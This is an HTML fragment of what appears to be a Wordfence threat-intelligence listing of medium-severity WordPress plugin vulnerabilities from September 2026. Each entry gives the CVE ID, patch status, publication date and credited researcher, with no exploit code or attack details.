<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ecd9c07e-8711-4ac8-86e1-faf29760fc3a" target="_blank" rel="noopener">Eventin &lt;= 4.1.23 &#8211; Unauthenticated Payment Bypass</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-84906" target="_blank" rel="noopener noreferrer">							CVE-2026-84906						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 14, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-event-solution" target="_blank" rel="noopener">Eventin – Events Calendar, Tickets, Registration, Booking &amp; WooCommerce</a> <span class="wfvr-software-slug">[wp-event-solution]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/cyberkareem" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/547ae1bca33f86331d44f737649d761e.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="547ae1bca33f86331d44f737649d761e"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/cyberkareem" target="_blank" rel="noopener">cyberkareem</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ecd9c07e-8711-4ac8-86e1-faf29760fc3a" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e0916e67-7240-49b6-9c85-93bf9daf316b" target="_blank" rel="noopener">FluentAuth – Login Security, Two-Factor Authentication, Passkeys &amp; Social Login &lt;= 2.1.2 &#8211; Unauthenticated Email Verification Bypass</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-78296" target="_blank" rel="noopener noreferrer">							CVE-2026-78296						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 17, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/fluent-security" target="_blank" rel="noopener">FluentAuth – Login Security, Two-Factor Authentication, Passkeys &amp; Social Login</a> <span class="wfvr-software-slug">[fluent-security]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ahmed-embaby" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/d90411d33d3b4405863dd1418e0950aa.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="d90411d33d3b4405863dd1418e0950aa"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ahmed-embaby" target="_blank" rel="noopener">Ahmed Embaby</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e0916e67-7240-49b6-9c85-93bf9daf316b" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/61499424-0002-4e17-81cf-468350e13e20" target="_blank" rel="noopener">Formidable Forms &lt;= 6.34 &#8211; Unauthenticated Content Injection</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-85641" target="_blank" rel="noopener noreferrer">							CVE-2026-85641						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 14, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/formidable" target="_blank" rel="noopener">Formidable Forms – WordPress Form Builder for Contact Forms, Calculators, Quizzes &amp; More</a> <span class="wfvr-software-slug">[formidable]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/karthik-ramakrishnan" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b83998e318a17b004dfe1f66689a2125.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b83998e318a17b004dfe1f66689a2125"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/karthik-ramakrishnan" target="_blank" rel="noopener">Karthik Ramakrishnan</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/61499424-0002-4e17-81cf-468350e13e20" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/edfa6e7c-2a53-49ff-ad7b-63d579be3acc" target="_blank" rel="noopener">Ghost (Hide My WP Ghost) &lt;= 7.0.10 &#8211; Unauthenticated Login Protection Bypass</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-86800" target="_blank" rel="noopener noreferrer">							CVE-2026-86800						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 16, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/hide-my-wp" target="_blank" rel="noopener">Hide My WP Ghost – Security &amp; Firewall</a> <span class="wfvr-software-slug">[hide-my-wp]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/animesh-gaurav" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/animesh-gaurav" target="_blank" rel="noopener">Animesh Gaurav</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/edfa6e7c-2a53-49ff-ad7b-63d579be3acc" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a05815dc-f4e7-4aa5-a4a0-db11c79f744e" target="_blank" rel="noopener">Ghost (Hide My WP Ghost) &lt;= 7.0.10 &#8211; Unauthenticated Protection Mechanism Bypass</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-86796" target="_blank" rel="noopener noreferrer">							CVE-2026-86796						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 16, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/hide-my-wp" target="_blank" rel="noopener">Hide My WP Ghost – Security &amp; Firewall</a> <span class="wfvr-software-slug">[hide-my-wp]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/kenny" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/873c27ed0a722f416e61978f85480b26.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="873c27ed0a722f416e61978f85480b26"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/kenny" target="_blank" rel="noopener">Kenny</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a05815dc-f4e7-4aa5-a4a0-db11c79f744e" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b7676362-4373-4c9a-b3cd-73fad9ff5477" target="_blank" rel="noopener">GPTranslate &lt;= 2.34.6 &#8211; Unauthenticated Sensitive Information Exposure in Public Frontend Inline Script</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-89278" target="_blank" rel="noopener noreferrer">							CVE-2026-89278						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 17, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/gptranslate" target="_blank" rel="noopener">GPTranslate – Multilingual AI Translation Agent for WordPress: Translate Your Site with AI</a> <span class="wfvr-software-slug">[gptranslate]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/supakiad-s" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/2be53568b04545bf9e036c375a3d44d9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="2be53568b04545bf9e036c375a3d44d9"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/supakiad-s" target="_blank" rel="noopener">Supakiad S. (m3ez)</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b7676362-4373-4c9a-b3cd-73fad9ff5477" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e1e20253-4002-467a-9dca-10bc2bfe4514" target="_blank" rel="noopener">Ibtana – Ecommerce Product Addons &lt;= 0.4.7.7 &#8211; Missing Authorization to Authenticated (Subscriber+) Arbitrary Post Meta Modification via &#8216;iepa_use_gt_editor&#8217; AJAX Action</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-1984" target="_blank" rel="noopener noreferrer">							CVE-2026-1984						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ibtana-ecommerce-product-addons" target="_blank" rel="noopener">Ibtana – Ecommerce Product Addons</a> <span class="wfvr-software-slug">[ibtana-ecommerce-product-addons]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/abhirup-konwar" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00b9210383dde323f6dbe14354fe953d.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00b9210383dde323f6dbe14354fe953d"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/abhirup-konwar" target="_blank" rel="noopener">Legion Hunter</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e1e20253-4002-467a-9dca-10bc2bfe4514" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/18bb20d5-325c-4a72-890c-edd38ab03cea" target="_blank" rel="noopener">JWT Authentication for WP REST APIs &lt;= 4.7.0 &#8211; Unauthenticated Authentication Method Downgrade via &#8216;mo_rest_api_test_config&#8217; Parameter</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-89027" target="_blank" rel="noopener noreferrer">							CVE-2026-89027						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 14, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-rest-api-authentication" target="_blank" rel="noopener">JWT Authentication for WP REST APIs</a> <span class="wfvr-software-slug">[wp-rest-api-authentication]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/choriyev-qahramon" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/4d8876b62aaa83428aafd305d0f556cc.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4d8876b62aaa83428aafd305d0f556cc"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/choriyev-qahramon" target="_blank" rel="noopener">Choriyev Qahramon</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/18bb20d5-325c-4a72-890c-edd38ab03cea" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/79a71442-05d3-4c84-881d-39c9a7f1bf40" target="_blank" rel="noopener">KBoard &lt;= 6.6 &#8211; Unauthenticated Insecure Direct Object Reference</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-88910" target="_blank" rel="noopener noreferrer">							CVE-2026-88910						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 14, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/kboard" target="_blank" rel="noopener">kboard</a> <span class="wfvr-software-slug">[kboard]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/seongjun-joo" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/dbebc4226fec7962303fbc0edb916019.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="dbebc4226fec7962303fbc0edb916019"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/seongjun-joo" target="_blank" rel="noopener">seongjun joo</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/79a71442-05d3-4c84-881d-39c9a7f1bf40" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/76dcb0f4-cb5b-447c-8cd1-ae97196d73a5" target="_blank" rel="noopener">King Addons for Elementor – 100+ Elementor Widgets, 4 000+ Elementor Templates, WooCommerce Builder, Mega Menu, Popup Builder &lt;= 51.1.81 &#8211; Unauthenticated Insecure Direct Object Reference</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66575" target="_blank" rel="noopener noreferrer">							CVE-2026-66575						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 17, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/king-addons" target="_blank" rel="noopener">King Addons for Elementor – 100+ Elementor Widgets, 4 000+ Elementor Templates, WooCommerce Builder, Mega Menu, Popup Builder</a> <span class="wfvr-software-slug">[king-addons]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/sakri-koskimies" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/374d26462b1a550f5378370bf9e5a572.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="374d26462b1a550f5378370bf9e5a572"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/sakri-koskimies" target="_blank" rel="noopener">Sakri Koskimies</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/76dcb0f4-cb5b-447c-8cd1-ae97196d73a5" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/6d3aff16-73f0-4c1a-9838-6fd6ec69a39f" target="_blank" rel="noopener">LearnPress &lt;= 4.4.6 &#8211; Unauthenticated Information Exposure</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-86445" target="_blank" rel="noopener noreferrer">							CVE-2026-86445						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 14, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/learnpress" target="_blank" rel="noopener">LearnPress – WordPress LMS Plugin for Create and Sell Online Courses</a> <span class="wfvr-software-slug">[learnpress]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/karthik-ramakrishnan" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b83998e318a17b004dfe1f66689a2125.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b83998e318a17b004dfe1f66689a2125"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/karthik-ramakrishnan" target="_blank" rel="noopener">Karthik Ramakrishnan</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/6d3aff16-73f0-4c1a-9838-6fd6ec69a39f" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/7c5248cc-6676-46cb-846b-a2c246425a54" target="_blank" rel="noopener">LearnPress &lt;= 4.4.6 &#8211; Unauthenticated Information Exposure</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-86447" target="_blank" rel="noopener noreferrer">							CVE-2026-86447						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 14, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/learnpress" target="_blank" rel="noopener">LearnPress – WordPress LMS Plugin for Create and Sell Online Courses</a> <span class="wfvr-software-slug">[learnpress]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/vuxvinh" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/cf5907d5170a7200adc6f07076350d97.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="cf5907d5170a7200adc6f07076350d97"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/vuxvinh" target="_blank" rel="noopener">vuxvinh</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/7c5248cc-6676-46cb-846b-a2c246425a54" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9f8b9b63-e858-44f1-bbb6-b2011bd08691" target="_blank" rel="noopener">LearnPress &lt;= 4.4.6 &#8211; Unauthenticated Information Exposure</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-86449" target="_blank" rel="noopener noreferrer">							CVE-2026-86449						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 14, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/learnpress" target="_blank" rel="noopener">LearnPress – WordPress LMS Plugin for Create and Sell Online Courses</a> <span class="wfvr-software-slug">[learnpress]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/sai-praneeth-koti" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/da87f3eddb4ac7ac5ccd63ae400c168c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="da87f3eddb4ac7ac5ccd63ae400c168c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/sai-praneeth-koti" target="_blank" rel="noopener">Sai Praneeth Koti</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9f8b9b63-e858-44f1-bbb6-b2011bd08691" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0ba153e1-b46c-404d-81ec-21bc7dfa3d8a" target="_blank" rel="noopener">LearnPress &lt;= 4.4.6 &#8211; Unauthenticated Information Exposure</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-86448" target="_blank" rel="noopener noreferrer">							CVE-2026-86448						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 14, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/learnpress" target="_blank" rel="noopener">LearnPress – WordPress LMS Plugin for Create and Sell Online Courses</a> <span class="wfvr-software-slug">[learnpress]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/artus-kg" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/66ac278d7e3fc457bdbe731edc3c5364.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="66ac278d7e3fc457bdbe731edc3c5364"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/artus-kg" target="_blank" rel="noopener">Artus KG</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
